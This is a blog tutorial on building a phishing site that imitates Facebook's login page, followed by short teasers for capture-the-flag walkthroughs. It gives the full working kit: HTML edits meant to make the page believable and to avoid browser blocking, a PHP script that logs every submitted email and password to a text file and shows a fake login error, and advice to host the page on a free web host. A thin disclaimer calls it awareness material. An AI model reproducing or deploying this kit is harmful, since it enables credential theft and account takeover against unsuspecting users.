Skip to main content

How to Create a Phishing Site From Scratch

Disclaimer: THIS BLOG IS FOR INFORMING THE RISK CAUSED BY PHISHING AND PLEASE DO NOT USE THIS FOR ILLEGAL PURPOSES.I AM NOT RESPONSIBLE FOR WHAT EVER AFTER EFFECTS YOU FACE IF YOU USE IT IN WRONG WAY!

REQUIREMENT

  • PHP BASICS
  • HTML BASICS
  • Account in free Web host such as 000webhost.com

What is Phishing?


In simple words, phishing is a method of hacking or a method of getting credentials by fooling others by pretending to be some trusted entity.

What we gonna do?


For the sake of example we gonna imitate Facebook and create a login screen similar to them and will fool users to login with it and we get their credentials.

What we need?

For this, the foremost thing we need is a login page similar to Facebook.In most of the tutorials they teach you to save Facebook page and edit it,but i wont recommend you that because if we do so its easy for the server or the browser to warn the users or block our page.So, we will need a fresh webpage. I surfed on the internet and found it in:

http://w3lessons.info/2013/10/17/facebook-style-homepage-design-with-registration-form-login-form-using-css3/

Once you download it we are ready to make our phishing page.Edit the “index.html” file using any text editor.
  • Edit the <title></title> to what ever you want but must be related to facebook (I named it Facebook Themes)
  • Now change <div id=”logo”<a href=”http://w3lessons.info"> W3lessons.info</a> </div> ,change the url to the name of the current webpage, i changed it to “index.html” and the name too,so the code looks like this for me:


<div id=”logo”><a href=”index.html”>FacebookThemes</a> </div>


Now we are into the form,you can see the form starting tag


<form method=”post” action=”” id=”login_form” name=”login_form”>
In this we have to specify what action our form should do , in short,we should divert our form data to some php file to validate and do the necessary steps. So within the quotes after “action=” we should place our php file name.like,
<form method=”post” action=”save.php” id=”login_form” name=”login_form”>
So we have finished our index page, but you can do more editing to the page writings to make it more believable one like above the signup tab you can change “welcome to facebook” and all those to something you want.
NOW SAVE THIS “index.html”
Next step is to create “save.php”,save it on the same directory

save.php

<?php
$handle=fopen(“data.txt”, “a”);
$atim =time();
$atime=date(“dS F Y”, $atim);
fwrite($handle,”\r\n”);
fwrite($handle,”\t\t\t\t\t\t\t HACKED ON:”);
fwrite($handle,$atime);
fwrite($handle,”\r\n”);
fwrite($handle,”\t\t\t\t\t\t======================================================”);
fwrite($handle,”\r\n”);
foreach($_POST as $variable=>$value)
{
fwrite($handle,”\t\t\t\t\t\t\t\t”);
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fwrite($handle,”\t\t\t\t\t\t======================================================”);
fclose($handle);
echo “Invalid E-mail/Password <br>”;
echo “Try Again”;
header(“Refresh:2;url=index.html”);
?>
Next create a text file named “data.txt” on same directory

DONE!

This is the simple phishing site now Host it on any free web hosting services like 000webhost.com

WORKING

The email and password entered in to the index.html will be sent to “save.php”.This php file will saves the email and password to “data.txt”. You can view this data anytime from you server by just opening it!

“REMEMBER NOT TO USE THIS FOR ANY ILLEGAL ACTIVITIES. KNOWLEDGE IS POWER BUT DO NOT MISUSE IT!” 

Comments

Popular posts from this blog

Hack Invite Code To Register - Hack The Box

Recently I found another website that have more advanced hacking challenges...I know I need to cover other websites which i have promised you but something in this website is interesting.For registering in this website,you need to hack and get an invite code.So, I thought to deviate from our regular topic and talk about it.
The WEBSITE is

HACK THE BOX

They are asking invite code for registering.As usual i checked source-code of the page.Since I found nothing suspicious,I started looking at JavaScript and found one that seems can help me.


<script defer src="/js/inviteapi.min.js"></script>I visited the js..There is a script and i found some keywords from that like "log","invite","verifyInviteCode","makeInviteCode"I went back to our registration page now right clicked and selected inspect.

SELECT CONSOLE

 Try typing in each keyword and check if function exist.


I got output when i checked verifyInviteCode();
But, there was no help fro…

Hack This Site Basic 1 Tutorial

Lets start our journey with hack this site.Visit the website and make an account.Login with your account.
Now we are going to look at basic 1.
Select Basic missions from left tab and choose basic 1

"This level is what we call "The Idiot Test", if you can't complete it, don't give up on learning all you can, but, don't go begging to someone else for the answer, thats one way to get you hated/made fun of. Enter the password and you can continue. "

This is the easiest level.It teaches you this, you should first look into the source code for some clue or vulnerability.
Yes! Just right click on the page and select view-source.Now you can see the source code.Read along the lines until you find the line containing password:
SPOILER HERE Yes you have hacked the first level!

Hack This Site Javascript mission 1

Idiot Testfaith is learning Javascript, the only thing that is protecting her from hackers is luck. REQUIREMENT
=============
Before we go into the javascript mission , you should know the basics of javascript..atleast you should be able to understand the code written in JavaScript!
YOU CAN LEARN BASICS OF JAVASCRIPT FROM: w3schools  or SoloLearn
ON OUR MISSION
===========
This mission has a password field in it and a submit button "check password". But,as always we do not have the password.As usual we type in something and click the button to check its response. It says "Fail D:"
now, even i tried with empty password and it still says same message.
But, there is something different here than in basic levels,the message is shown in alert box, which means java-script is clearing in action behind this.Lets view its source code.Right click and select view page source.Now, here you have two option for finding the script in use, first is press "ctrl+f" and find box w…